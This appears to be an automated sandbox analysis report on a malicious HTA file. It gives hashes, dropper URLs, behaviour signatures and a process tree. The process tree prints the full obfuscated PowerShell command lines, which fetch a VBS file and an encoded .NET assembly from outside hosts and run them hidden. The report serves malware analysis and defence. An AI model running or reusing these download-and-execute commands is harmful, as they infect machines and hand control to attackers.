Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20241023-en
  • resource tags

    arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
  • submitted
    26-11-2024 08:24

General

  • Target

    sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta

  • Size

    599KB

  • MD5

    5a9dc05899d1a19be638824e5f47b88e

  • SHA1

    418e5c2cfc4ba40069bbcbc7373e9ff0b71740f2

  • SHA256

    741297ecc59d39296f360b100032cdb120af2eb4ccc5b91f370c0eacb9ee7e25

  • SHA512

    0772c9718b79ccff96ed8631ad22d117876c1cb5f1b9313494051e52a63b8f360d8f5fc81beaee296e120a873e99414818bb36db6bf795dfe99d54b3f47f4d7e

  • SSDEEP

    192:4dE6COljVneLyZXcFeLyZXcEeLyZXc/Czt4kQ:b6COljV+zO7

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c

exe.dropper

https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2816
    • C:\Windows\SysWOW64\WInDowSpoWeRShell\V1.0\POwersheLL.exE
      "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'JFM1UFpiNiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJERUZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhwSGhsTndBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRSdEdKUEJ0ZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaEFVYVRQUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjTWFReEFTWWhsSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInhaQm5VRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NzVWlPTklmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTNVBaYjY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjQ2LjI2LzE0MjIvYmVzdG9mdGhpbmdzd2l0aGVudGlyZXRpbWVnaXZlbmVic3R0aGlnbnN0b2Rvd2l0aGdyZWF0LnRJRiIsIiRFblY6QVBQREFUQVxiZXN0b2Z0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZWJzdHRoaWduc3RvZG93aXRoZy52QnMiLDAsMCk7U3RhclQtc2xFRVAoMyk7SWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGJlc3RvZnRoaW5nc3dpdGhlbnRpcmV0aW1lZ2l2ZW5lYnN0dGhpZ25zdG9kb3dpdGhnLnZCcyI='+[cHaR]0x22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2800
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2720
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n22s0gha.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:536
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES736C.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC736B.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:352
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2200
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnMmtkaW1hZycrJ2VVcmwgPSBlQzRodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlLycrJ2dldD9maWxla2V5PXMnKydoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtJysnZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBlQzQ7Mmtkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsya2RpbWFnZUJ5dGVzID0gMmtkd2ViQ2xpZW50LkRvdycrJ24nKydsb2FkRGF0YSgya2RpbWFnZVVybCk7MmtkaW1hZ2VUZXh0ID0gJysnW1N5c3RlbS5UZScrJ3h0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoMmtkaW1hZ2VCeXRlcycrJyk7Mmtkc3RhcnRGbGFnID0gZUM0PDxCQVNFNjRfU1RBUlQ+PmVDJysnNDsya2RlbmRGbGFnID0gZUM0PDxCQVNFNjRfRU5EPj5lQzQ7Mmtkc3RhcnRJbmRleCA9IDJrZGltYWdlVGV4dC5JbmRleE9mKDJrZHN0YXJ0RmxhZyk7MmtkZScrJ24nKydkSW5kZXggPSAya2RpbWFnZVRleHQuSW5kZXgnKydPZigya2RlbmRGbGEnKydnKTsya2RzdGFydEluZGV4IC1nZSAwIC1hbmQgMmtkZW5kSW5kZXggLWd0IDJrZHN0YXInKyd0SW5kZXg7Mmtkc3RhcnRJbmRleCArPSAya2RzdGFydEZsYWcuTGVuZ3QnKydoOzJrZGJhc2U2NExlbmd0aCA9IDJrZGVuZEluZGV4IC0gMmtkc3RhcnRJbmRleDsya2RiYXNlNjRDb21tYW5kID0gMmsnKydkaW1hZ2VUJysnZXh0LlN1YnN0cmluZygya2RzdGFydEluZGV4LCAya2RiYXNlNjRMZW5ndGgpOzJrZGJhc2U2NFJlJysndmVyc2VkID0gLWpvaW4gKDJrZGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBzeVYgRm9yRWFjaC1PYmplY3QgeyAya2RfIH0pWy0xLi4tKDJrZGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07MmtkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhcycrJ2U2NFN0cmluZygya2RiYXNlNjRSZXZlcnNlZCk7MmtkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKDJrZGNvbW1hbmRCeXRlcyk7MmtkdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChlQzRWQUllQzQpOzJrZHZhaU1ldGhvZC5JbnZva2UoJysnMmtkbnVsbCwgQChlQzR0eHQuRkdWR0ZSLzIyNDEvNjIuNjQuOCcrJzYxLjQwMS8vOnB0dGhlQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsJysnIGVDNENhc1BvbGVDNCwgZUM0ZGVzYXRpdmFkb2VDNCwgZUM0ZGVzYXRpdmFkb2VDNCxlQycrJzRkZXNhdGl2YWRvJysnZUM0LGVDNGRlc2F0aScrJ3ZhZG9lQzQsZUM0ZGVzYXRpdmFkb2VDNCxlQzRkZXNhdGl2YWRvZUM0LGVDNGRlc2F0aXZhZG9lQycrJzQsZUM0MWVDNCxlQzRkZXNhdGl2YWRvZUM0KSk7JykgIC1jcmVwbEFDZSAgKFtjaEFSXTExNStbY2hBUl0xMjErW2NoQVJdODYpLFtjaEFSXTEyNCAgLVJlUExBY2UgIChbY2hBUl01MCtbY2hBUl0xMDcrW2NoQVJdMTAwKSxbY2hBUl0zNiAtY3JlcGxBQ2UnZUM0JyxbY2hBUl0zOSl8IC4oKGd2ICcqTURyKicpLk5BTWVbMywxMSwyXS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:296
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2000

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RES736C.tmp

    Filesize

    1KB

    MD5

    dfcc6e033c6057b86615e41c4f754e93

    SHA1

    eacb7f9b9fcda345376c24a77b2e7ed2568dee15

    SHA256

    5772f53f56d5451c13bd0883fe3dd9cf1904eda312ec09b11ae48bc2c757c231

    SHA512

    433aa4b8e594f3190ced2e0dcf415cddacab9746e59494b97e313eda4e50e59975ee9cdbaac503f89b24ec1c950083b9501bf574342e0f78af1123a08d13bfdb

  • C:\Users\Admin\AppData\Local\Temp\n22s0gha.dll

    Filesize

    3KB

    MD5

    8ad4fc200163eabba0f5f4a5d84f5dd0

    SHA1

    5b20d383d33ced67eb6b8f4961b0923fb7140d0e

    SHA256

    c9dc322b71adb63be7a221523ace0bb2ee2d5c5a78cea107b9155b969f4a0cec

    SHA512

    622311837fe050f942f92313c5ad4f0a1d1bba0095088a71554bc5c0b65d3d6cb79dfa6bf7fe139ca44c4716773b54e4031c6e70e00b81e95a57f7d44e69477a

  • C:\Users\Admin\AppData\Local\Temp\n22s0gha.pdb

    Filesize

    7KB

    MD5

    3b6ed67d50e6d9f2bf4bdc949424f59b

    SHA1

    dcbce853eaa538dc27f187d4b7297f46c9f335b7

    SHA256

    c3d22beeb3f81a55659ed3080f8113493e592f8df3b76f821b874eaafaa9ce63

    SHA512

    646bf01669b07a1e7164ccc8787a6faaf59c42d73fef8b786d3d9eae2273fb5227902a82576f0a390a81d1fcd49ef0c0defd5721ae02fc0a10cff68811a640b1

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    9e61836c155cb1048f402c6bb1adb564

    SHA1

    848f21fce5250f173a5b8428d582f65f106d8994

    SHA256

    3444d24cf708c1d3f11796bfa514084cc0145344b04efca8c5b01eacb907bba5

    SHA512

    82626a864567a7022286de94380a172f387dd96c5f3109aaabaa145c33ff612eb0576af471ade4ce6834f4364a791ced599c102c2b34eb2930c1a0930cc1f792

  • C:\Users\Admin\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs

    Filesize

    162KB

    MD5

    8ba4e1dcc487bd110b4bcd41e7ee2ba5

    SHA1

    1881afff1eb946fdb3ee62133ca43d0bc136ac37

    SHA256

    4bcb2f9b3a929bd940484218ef0a8c03842480a15bd8a3c4521f5097bd89d581

    SHA512

    006b7dcfdb7ee27ca1e6aa536c2399321966ffc3b82bc0f86470614345b6e0a2a1ed1d7a143c500669fba375f9706cff8ed421502df7f12f49c3260dc5a8bde4

  • \??\PIPE\srvsvc

    MD5

    d41d8cd98f00b204e9800998ecf8427e

    SHA1

    da39a3ee5e6b4b0d3255bfef95601890afd80709

    SHA256

    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

    SHA512

    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC736B.tmp

    Filesize

    652B

    MD5

    7eb7fd40d5b3daee4fc59a99fd71115b

    SHA1

    a3d2b0423549dd73936f6ff08d13ec7f9cc37eba

    SHA256

    41e7d63b1f2546c51a8f8bc6895efaff502490506a93dabe9107a21a11c3d448

    SHA512

    4535012a466fe64e31497ad071b41bbdb800752ad5d929a0721e75c7070f1045f95360e96a61e05eb231638100f2d0643eff084608d8220b87555745ef3e305b

  • \??\c:\Users\Admin\AppData\Local\Temp\n22s0gha.0.cs

    Filesize

    488B

    MD5

    df59540f8edd52a40245b77825076b5c

    SHA1

    101a773a82eef36b277291d6e450d4984136b176

    SHA256

    041ed2f3f184dd53c0b2bacbe7e55a05a747a3ed1aa2cab0e8c93e9ab25a121f

    SHA512

    790e1139eab1d895386730743ea05b591820178b76fec615acab192ad8d2c5960703cebc2c6f4efc8158020506f35cb69ae6545c649e3d87b74845fbc2ec1990

  • \??\c:\Users\Admin\AppData\Local\Temp\n22s0gha.cmdline

    Filesize

    309B

    MD5

    522c8f72430f651808df2a790fe864cd

    SHA1

    a2c240eed362dec038ad12f24127d256913982de

    SHA256

    4d844ebff8b63fb93b29f25d0a1c50fc3d6d5b8d7161ced686303227fdaa91e6

    SHA512

    9a8115463b56309954c8e17bf4a2ee2954f319d2be9fa1eb20439a195f8a42b870fe35f3670ced4536c3006572fda83eacca434edf8255332ac198804b4b5840